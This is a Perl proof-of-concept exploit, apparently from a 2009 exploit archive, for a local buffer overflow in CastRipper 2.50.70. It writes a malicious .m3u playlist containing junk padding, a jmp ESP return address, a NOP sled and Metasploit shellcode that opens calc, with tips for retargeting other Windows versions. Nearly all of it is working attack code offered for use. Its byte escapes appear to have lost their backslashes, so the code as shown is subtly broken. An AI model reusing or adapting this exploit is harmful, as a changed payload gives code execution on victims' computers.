#!/usr/bin/perl
#[+]--------------------------------------------------------------------------------------[+]#
# CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit
# By [0]x80->[H]4x?20r
# hashteck[at]Gmail[dot]com
# From Morocco
#[+]--------------------------------------------------------------------------------------[+]#
# program : CastRipper
# version : 2.50.70
# download : http://www.mini-stream.net/castripper/
#[+]--------------------------------------------------------------------------------------[+]#
# Tested Under Win$hit Vista Pro
# After launching the sploit just drag&drop the .m3u file in the Ripper , Enjoy ;)#
# NOTE : if you want to use it under an other version of Win32 use jmpfind.exe 
#( avalaible on the net) to find a matching address with which you'll overwrite your EIP .
#[+]--------------------------------------------------------------------------------------[+]#
##################################### Proud to be Moroccan ###################################


$junk="x41" x 17379;
$eip="xF8x03xB1x76"; # 0x76B103F8 jmp ESP - Kernel32.dll
$nops="x46" x 10;
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
$shell =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x88".
"xd3x37xccx83xebxfcxe2xf4x74x3bx73xccx88xd3xbcx89".
"xb4x58x4bxc9xf0xd2xd8x47xc7xcbxbcx93xa8xd2xdcx85".
"x03xe7xbcxcdx66xe2xf7x55x24x57xf7xb8x8fx12xfdxc1".
"x89x11xdcx38xb3x87x13xc8xfdx36xbcx93xacxd2xdcxaa".
"x03xdfx7cx47xd7xcfx36x27x03xcfxbcxcdx63x5ax6bxe8".
"x8cx10x06x0cxecx58x77xfcx0dx13x4fxc0x03x93x3bx47".
"xf8xcfx9ax47xe0xdbxdcxc5x03x53x87xccx88xd3xbcxa4".
"xb4x8cx06x3axe8x85xbex34x0bx13x4cx9cxe0x23xbdxc8".
"xd7xbbxafx32x02xddx60x33x6fxb0x56xa0xebxd3x37xcc";

# | --------------Junk-------------|-EIP-|----Nops----|-----------Shellcode----------|
open(m3u,">>Exploit.m3u");
print m3u $junk.$eip.$nops.$shell;
print "[+] Done !! [+]";
close(m3u);

# www.Syue.com [2009-05-12]